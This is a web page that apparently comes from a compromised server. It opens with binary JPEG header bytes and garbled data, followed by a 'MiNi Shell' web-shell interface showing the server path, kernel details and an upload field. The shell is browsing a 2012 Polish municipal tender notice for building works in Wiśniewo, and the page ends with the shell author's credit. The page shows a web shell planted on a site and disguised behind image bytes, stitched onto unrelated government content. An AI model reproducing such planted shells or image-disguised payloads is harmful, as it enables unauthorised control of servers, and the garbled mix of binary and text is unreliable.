JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/80391-N-2012.html

<p class="kh_header"><b>Wiśniewo: Zagospodarowanie przestrzeni publicznej w miejscowości Wiśniewo w Gminie Wiśniewo.</b><br>
<b>Numer ogłoszenia: 80391 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , 06-521 Wiśniewo, woj. mazowieckie, tel. 023 6557024, faks 023 6557227.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bazagmin.pl/bip_wisniewo/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie przestrzeni publicznej w miejscowości Wiśniewo w Gminie Wiśniewo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zagospodarowanie przestrzeni publicznej w miejscowości Wiśniewo w Gminie Wiśniewo.
BOISKO
Roboty pomiarowe przy powierzchniowych robotach ziemnych - koryta pod na- wierzchnie boiska - 0.132 ha, Usunięcie warstwy ziemi urodzajnej (humusu) o grubości do 15 cm za pomocą spycharek - 1320.000 m2, Wykopy wykonywane spycharkami o mocy 110 kW (150 KM) w gruncie kat. III - 132.000 m3, Roboty ziemne wykonywane koparkami podsiębiernymi o poj.łySki 0.15 m3 w gr.kat. I-III w ziemi uprzednio zmag.w hałdach z transp.urobku na odl. 1 km sam.samowyład. -325.500 m3, Dodatek za kaSdy rozp. 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej(kat.gr. I-IV) Krotność = 4 - 325.500 m3, Ręczne formowanie nasypów z ziemi leSącej na odkładzie z przemieszczeniem spycharkami lub zgarniarkami (kat.gr.III-IV) - 4.500 m3, Profilowanie i zagęszczanie podłoSa wykonywane mechanicznie w gruncie kat. II- IV pod warstwy konstrukcyjne nawierzchni - 1320.000 m2, Warstwy odsączające zagęszczane mechanicznie o gr.20 cm (boisko) - 1320.000 m2, Podbudowa betonowa z betonu jamistego z dylatacją - grubość warstwy po za- gęszczeniu 12 cm - 1320.000 m2, Podbudowa betonowa z dylatacją - za kaSdy dalszy 1 cm grubość warstwy po za- gęszczeniu (do 15 cm) Krotność = 3- 1320.000 m2, Stopy fundamentowe betonowe, o objętości do 0,5 m3 - z wykorzystaniem pom- py do betonu -pod tuleje wyposaSenia i stojaki do koszykówki - 2.000 m3, Nawierzchnia poliuretanowa 13mm.,baza z granulatu gumowego 11mm.,powle- czona natryskowo barwionym poliuretanem z granulatem gumowym o grubości 2mm wraz z malowaniem linii boisk. - 1320.000 m2, Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej, spoiny wypeł- nione piaskiem - 148.000 m, Osadzenie tulei do słupków i stojaków siatkówki w gotowych fundamentach - 2.000 szt., Osadzenie tulei do słupków i stojaków do bramek piłki ręcznej w gotowych funda- mentach - 4.000 szt., Ustawienie w gotowych otworach stojaków do siatkówki- 2.000 szt., Dostawa zestawów do siatkówki, słupki stalowe, aparat naciagowy, siatka, całość z certyfikatem na znak bezpieczeństwa - 1.000 szt, Ustawienie w gotowych otworach i regulacja bramek stalowo-drewnianych do piłki ręcznej - 2.000 szt., Ustawienie w gotowych otworach i regulacja stojaków metalowych do koszykówki - 2.000 szt., Dostawa zestawów do piłki ręcznej, bramki z tulejami i siatkami, całość z certyfi- katem na znak bezpieczeństwa - 2.000 szt, Dostawa zestawu do koszykówki, wysięg 1,6m, wysokość do obręczy 3,05m, tab- lica laminowana 120x90cm, obręcz uchylna, siateczka, całość z certyfikatem na znak bezpieczeństwa - 1.000 kpl, Wykopanie dołów o powierzchni dna do 0.2 m2 i głębokości do 1.0 m (kat.gr.III - 62.000 dół., Rozplantowanie ręczne ziemi wydobytej z wykopów - za 1 m3 ziemi wzdłuS 1 m krawędzi wykopu - kat.gr.IV - 12.400 m3, Stopy fundamentowe betonowe, o objętości do 0,5 m3 - z wykorzystaniem pom- py do betonu - 15.500 m3, Ogrodzenie z siatki wysokości 4 m na słupkach stalowych profilowanych o roz- stawie 2.5 m obsadzonych w gniazdach - 128.000 m, Wrota + 3 furtki wysokości 2,5 m; szerokość wrót 2,5 m i furtki 1 m z siatki w ra- mach stalowych na gotowych słupkach - systemy panelowe przemysłowe - 1.000 kpl.
PARKING
Mechaniczna rozbiórka nawierzchni z płyt betonowych sześciokątnych i kwadratowych gr. 12 i 15 cm bez względu na rodzaj spin i i podsypki z wywozem na odl. Do 1 km - 670,00 m2, Mechaniczna rozbiórka krawężników betonowych 15x30 cm wraz  z ławą z wywozem na odl. Do 1 km - 48,50 m, Wywiezienie gruzu spryzmowanego samochodami samowyładowczymi - za każdy następny 1 km x 6 =6 km -   107,80 m3, Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV głębokość 20 cm - 867,00 m2, Podbudowa betonowa z dylatacją - grubość warstwy po zagęszczeniu 12 cm - 867,00  m2 , Nawierzchnie z kostki brukowej betonowej grubości 6 cm na podsypce piaskowej -867,00 m2.
BIBLIOTEKA 
Pomiary przy wykopach fundamentowych -11,34 m3, Usunięcie warstwy ziemi urodzajnej za pomocą spycharek o gr. 20cm - 105,60 m2, Roboty ziemne wykonywane koparkami o poj. Łyżki 0,15 m3 z transportem urobku samochodem samowyładowawczym na odl. do 1 km- 11,34 m3 , Ręczne zasypywanie wykopów ze skarpami z przerzutem na odległość do 3,0m - 4,0  m3, Plantowanie ręczne terenu - 105,60 m2, Wykonywanie trawników z nawożeniem 40,0 m2, Ławy fundamentowe betonowe z betonu - 13,33 m3, Ściany zewnętrzne z gazobetonu ( warstwa wewn. 24 cm, styropian 8 cm, warstwa zew. 12 cm  - 54,03 m2, Ścianki działowe z gazobetonu o gr. 12 cm - 27,85 m2, Komin wolnostojący wieloprzewodowy o przekroju 1/2x1/2x cegły -1,47 m2, Wieńce monolityczne na ścianie zewnętrznej z betonu B-20 - 1,21 m3, Konstrukcja dachu-krokwie o przekroju 8x16cm pas dolny i górny- 2,94 m3, Murłaty o przekroju 12x14cm -0,26 m3, Płatew o przekroju 12x14cm - 0,25 m3, Słupy o przekroju 12x12cm - 0,29 m3, Krzyżulce i miecze-0,81 m3, Przybicie deski czołowej - 31,32 m, Pokrycie dachu blachą powlekaną trapezową - 109,15 m2, Pokrycie ścian bocznych blachą j.w.  - 6,26 m2, Rynny dachowe o12cm z blachy ocynkowanej - 31,32 m, Rury spustowe o10cm z blachy ocynkowanej -6,0 m,  Folia dachowa paroszczelna układana na kontr łatach co 0,9m łaty nasycone 3x5 cm - 109,15 m2, Izolacja przeciwwilgociowa pozioma z papy asfaltowej na lepiku na gorąco 91,11 m2 Izolacja cieplna stropodach z wełny mineralnej o gr.18 cm - 84,56 m2, Izolacja cieplna posadzki ze styropianem o gr. 10 cm na sucho - 80,55 m2, Okno jednoramowe z PCV o pow. do 2,0 m2 1,26 m2, Okna jednoramowe z PCV o pow. ponad 2m2- 7,70 m2, Parapety lastrykowe - 6,30 m, Ościeżnice drzwi stalowe dla drzwi wewnętrznych - 5 szt., Skrzydło drzwiowe wewnętrzne płytowe-8,85 m2, Podkład na podłożu gruntowym z ubitej pospółki - 12,08 m3, Podkład betonowy na podłożu gruntowym gr. 10 cm B-10 - 8,06 m3, Warstwa wyrównawcza pod posadzki z zaprawy cementowej gr. 4 cm zatartych na ostro- 79,26 m2, Posadzka z płytek terakotowych w wym.20x20cm na masie klejowej ze spoinowaniem - 79,26 m2 , Cokolik płytek o wym.20x20cmi wysokości 10 cm - 53,94 m, Tynki wewnętrzne kat.III ścian wykonywane ręcznie - 102,97 m2 , Konstrukcja rusztu z listew drewnianych pod okładziny z płyt gipsowych-79,26 m2 , Okładziny powierzchni stropów 2xpłyta gipsowa  - 79,26 m2, Licowanie ścian płytkami 20x20cm glazurowymi na masie klejowej spoinowane - 39,28 m2, Okładziny powierzchni słupów drewnianych płytą gipsową 2x - 4,15 m2, Tynki zwykłe kat. III nakrapiane wykonywane ręcznie - 66,97, m2, Opaska z betonu B-25 przy ścianie zewnętrznej-  1,50 m3, Podkład na podłożu gruntowym pod opaskę betonową o gr. 10 cm z ubitego piasku- 1,25 m3, Dwukrotne malowanie farbami emulsyjnymi tynków gładkich wewnętrznych - 102,97 m2, Dwukrotne malowanie farbami emulsyjnymi płyt gipsowych sufitów spoinowanych, szpachlowanych z gruntowaniem - 79,26 m2, Wewnętrzna instalacja elektryczna z podłączeniem do istniejącej w budynku wraz z wykonaniem badań,  Wewnętrzna instalacja wod-kan , c.o. oraz c.w. w podłączeniem do istniejącego budynku ( wraz z osprzętem wraz z wonaniem badań..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić wykonawcy zamówień  nie więcej niż 50% wartości niniejszego zamówienia w okresie 3 lat od udzielenia zamówienia podstawowego wykonawcy w sytuacji określonej w art. 67 ust. 1 pkt. 5 i 6 ustawy - Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.23.32.50-6, 45.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków w postępowaniu dokonana będzie w oparciu o dokumenty złożone przez wykonawę w niniejszym postepowaniu metoda graniczną - spełnia, nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych przez zamawiającego  i podanych w SIWZ dołaczonych do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iz ww warunki wykonawca spełni. Niespełnienie choćby jednego z ww warunków będzie skutkować wykluczeniem wykonawcy z postępowania. Ofertę wykonawcy wykluczonego uważa sie za odrzucona.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, formukarze kosztorysowe, parafowany wzór umowy, wykaz częśći zamówienia, których wykonanie zamierz powierzyć podwykonawcom - zgodnie z pkt. 9 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron, wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie w następujących okolicznościach:
1.	Zmiana terminu wykonania zamówienia:
-	w przypadku wystąpienia trudnych warunków atmosferycznych i zdarzeń losowych, które  istotnie utrudniają  lub uniemożliwiają prowadzenie robót w umówiony sposób.
-	W przypadku konieczności wykonania robót dodatkowych, od których zależy wykonanie przedmiotu zamówienia.
2.	Konieczności wykonania robót zamiennych.
3.	Zmiany wysokości podatku VAT.
4.	W przypadku rezygnacji przez zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące  wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł związku z wynikającymi z umowy planowanymi świadczeniami.
Wszystkie powyższe postanowienia stanowią katalog zmian na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bazagmin.pl/bip_wisniewo/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiśniewo, 06-521 Wiśniewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2012 godzina 12:00, miejsce: Urząd Gminy Wiśniewo, 06-521 Wiśniewo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROW działanie 313,322,323 - Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com